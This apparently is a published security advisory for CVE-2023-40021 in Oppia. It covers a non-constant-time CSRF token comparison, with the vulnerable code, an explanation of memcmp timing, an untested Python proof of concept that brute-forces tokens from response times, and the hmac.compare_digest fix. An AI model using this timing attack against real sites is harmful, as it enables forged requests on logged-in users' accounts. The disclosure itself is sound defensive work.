CVE-2023-40021: Timing Attack Reveals CSRF Tokens

Vulnerability Report

Summary

When comparing a received CSRF token against the expected token, Oppia uses the string equality operator (==), which is not safe against timing attacks. By repeatedly submitting invalid tokens, an attacker can brute-force the expected CSRF token character by character. Once they have recovered the token, they can then submit a forged request on behalf of a logged-in user and execute privileged actions on that user's behalf.

Details

The function to validate received CSRF tokens is at oppia.core.controllers.base.CsrfTokenManager.is_csrf_token_valid:

oppia/core/controllers/base.py

Lines 964 to 990 in 3a05c35

    
               def is_csrf_token_valid(cls, user_id: Optional[str], token: str) -> bool: 
        
                   """Validates a given CSRF token. 
        
                   Args: 
        
                       user_id: str|None. The user_id to validate the CSRF token against. 
        
                       token: str. The CSRF token to validate. 
        
                   Returns: 
        
                       bool. Whether the given CSRF token is valid. 
        
                   """ 
        
                   try: 
        
                       parts = token.split('/') 
        
                       if len(parts) != 2: 
        
                           return False 
        
                       issued_on = int(parts[0]) 
        
                       age = cls._get_current_time() - issued_on 
        
                       if age > cls._CSRF_TOKEN_AGE_SECS: 
        
                           return False 
        
                       authentic_token = cls._create_token(user_id, issued_on) 
        
                       if authentic_token == token: 
        
                           return True 
        
                       return False 
        
                   except Exception: 
        
                       return False

The vulnerability is here:

oppia/core/controllers/base.py

Line 985 in 3a05c35

if authentic_token == token:

In CPython, the equality operator on unicode objects uses memcmp to compare the objects' values (see Objects/unicodeobject.c in the CPython repo):

static int
unicode_compare_eq(PyObject *str1, PyObject *str2)
{
    int kind;
    const void *data1, *data2;
    Py_ssize_t len;
    int cmp;

    len = PyUnicode_GET_LENGTH(str1);
    if (PyUnicode_GET_LENGTH(str2) != len)
        return 0;
    kind = PyUnicode_KIND(str1);
    if (PyUnicode_KIND(str2) != kind)
        return 0;
    data1 = PyUnicode_DATA(str1);
    data2 = PyUnicode_DATA(str2);

    cmp = memcmp(data1, data2, len * kind);
    return (cmp == 0);
}

Here is an example implementation of memcmp from gcc (from libgcc/memcmp.c in the gcc repo):

int
memcmp (const void *str1, const void *str2, size_t count)
{
  const unsigned char *s1 = str1;
  const unsigned char *s2 = str2;

  while (count-- > 0)
    {
      if (*s1++ != *s2++)
	  return s1[-1] < s2[-1] ? -1 : 1;
    }
  return 0;
}

Notice that this function is not constant-time; that is, if str1 and str2 have their first difference at an earlier index, the function will terminate sooner. This means that if the received CSRF token and the expected one differ at an earlier index, the is_csrf_token_valid() function will terminate sooner, which leaks sensitive information to an attacker. For details on how an attacker can abuse this information, see the PoC below.

PoC

Note: I have not tested this PoC. I am including it as an example of how this vulnerability could be abused to make the potential attack clear.

Prerequisites: To pull off this attack, an attacker needs a user to be logged-in to Oppia and have an attacker-controlled website open at the same time.

Attack: The attacker-controlled website issues requests to a protected Oppia endpoint, for example a PUT request to https://www.oppiatestserver.org/preferenceshandler/data to change the user's bio with the following payload:

{
  "payload": {"update_type": "user_bio", "data": "testing"},
  "csrf_token": "1691808272/GONUjFmtQN0DkHt67ucdZw==",
  "source": "https://www.oppiatestserver.org/preferences"
}

Note that the CSRF token could be generated like this:

>>> import base64
>>> import hmac
>>> import time
>>> digest = base64.urlsafe_b64encode(hmac.digest(b'key', b'msg', digest='md5')).decode('utf-8')
>>> timestamp = time.time()
>>> print(f'{timestamp}/{digest}')
1691808272/GONUjFmtQN0DkHt67ucdZw==

Since the user is logged-in to Oppia, their valid session cookie will be sent along with the request, making it appear that the request came from an authorized user. However, the CSRF token will be invalid (here and elsewhere, I'm ignoring the negligible possibility of 128-bit collisions). The attacker needs to guess the 128-bit digest portion of the token, which is normally impossible. However, in this case, they can take advantage of the timing vulnerability discussed above. Here's how the attack might work (code is in Python for clarity, but to run on the attacker-controlled website, this would be implemented in JavaScript):

import time
import numpy as np

# Defined in RFC 4648, section 5: https://datatracker.ietf.org/doc/html/rfc4648.html#section-5
ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_"
# How many trials to average timing measurements over. Averaging removes noise from network latency.
TRIALS = 5

# A base64-encoded MD5 hash is always 22 characters from ALPHABET, followed by two padding characters.
# This is because an MD5 hash is 128 bits. Each Base64 character provides log2(64)=6 bits of information,
# so we need ceil(128/6)=22 Base64 characters to encode the hash. Then 2 padding characters get added
# because Base64 encodes every 3 bytes as 4-character chunks, so the length of the base64 string needs to
# be a multiple of 4. Source: https://stackoverflow.com/a/13296298.
guess = ALPHABET[0] * 22 + '=='
for known_chars in range(22):
    avg_times = []
    for char in ALPHABET:
        guess[known_chars] = char
        total_time = 0
        for _ in range(TRIALS):
            start = time.time()
            # Suppose we have a submit_request() function that takes a time and a guess, 
            # crafts the request, and sends it.
            submit_request(start, guess)
            end = time.time()
            total_time += (end - start)
        avg_times.append(total_time / TRIALS)
    # With the correct guess, the submitted and expected tokens shared a longer prefix, so rejection took longer.
    guess[known_chars] = ALPHABET[np.argmax(avg_times)]

Sometime in the last iteration of the outer loop (and possibly earlier if the attacker got lucky), the guess was correct and the request was accepted by the server, completing the attack.

Caveats: This attack has to complete within 1 second because every second, the time used in computing the token changes. The attacker then has to start their brute-forcing from scratch. However, the attacker only needs to submit 22(64)5=7,040 requests within this second, which while not trivial, is feasible. Further, an attacker will in expectation hit the correct token after submitting only half as many requests, may be able to optimize the brute-forcing logic to use fewer trials, and can run this attack against many users so that even a low probability of guessing the token leads to at least some successful attacks.

Suggested Remediation

Essential: The expected and received CSRF tokens should be compared using hmac.compare_digest() instead, which is constant-time. The new code would look like this:

            if hmac.compare_digest(authentic_token, token):

Note that compare_digest only accepts either two ASCII-only str objects or two bytes objects.

Suggested:

Instead of computing the HMAC with MD5, use SHA256. While the attacks on MD5 so far do not compromise the security of an HMAC, it would be prudent to move away from MD5 since attacks will likely get better over time.
CSRF tokens should ideally be scoped to user sessions, but Oppia currently leaves them valid for 48 hours. This means that when a user logs out and logs back in, a CSRF token from the previous session could still be valid, which is not ideal. I don't see any attacks that this would allow, but session-scoped CSRF tokens are a common best practice (see OWASP link below).
CSRF tokens should include a nonce, not just a timestamp, to ensure that consecutive calls in the same second produce different tokens. Again, this is more of a best-practice thing (see OWASP link below) than a protection against an attack (at least that I can see).

Impact

An attacker who can lure a logged-in Oppia user to a malicious website can perform any change on Oppia that the user is authorized to do, including changing profile information; creating, deleting, and changing explorations; etc. Note that the attacker cannot change a user's login credentials since those are managed by Google, which (hopefully) has its own CSRF protections.

Remediation

The essential remediation and suggested remediations 1 and 3 were implemented in #18769, which was merged in commit b89bf80. This commit will be deployed to production as part of May 2023 hotfix 2.

Timeline

Reported: 2023-08-11
CVE CVE-2023-40021 assigned: 2023-08-14
Remediated:
- Remediation Merged: 2023-08-12
- Remediation Deployed: 2023-08-14 (in May 2023 hotfix 2)
Disclosed: 2023-08-16

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

CVE-2023-40021: Timing Attack Reveals CSRF Tokens

Package

Affected versions

Patched versions

Description

Vulnerability Report

Summary

Details

PoC

Suggested Remediation

Impact

Remediation

Timeline

Severity

CVSS base metrics

CVE ID

Weaknesses

Credits

	def is_csrf_token_valid(cls, user_id: Optional[str], token: str) -> bool:
	"""Validates a given CSRF token.

	Args:
	user_id: str\|None. The user_id to validate the CSRF token against.
	token: str. The CSRF token to validate.

	Returns:
	bool. Whether the given CSRF token is valid.
	"""
	try:
	parts = token.split('/')
	if len(parts) != 2:
	return False

	issued_on = int(parts[0])
	age = cls._get_current_time() - issued_on
	if age > cls._CSRF_TOKEN_AGE_SECS:
	return False

	authentic_token = cls._create_token(user_id, issued_on)
	if authentic_token == token:
	return True

	return False
	except Exception:
	return False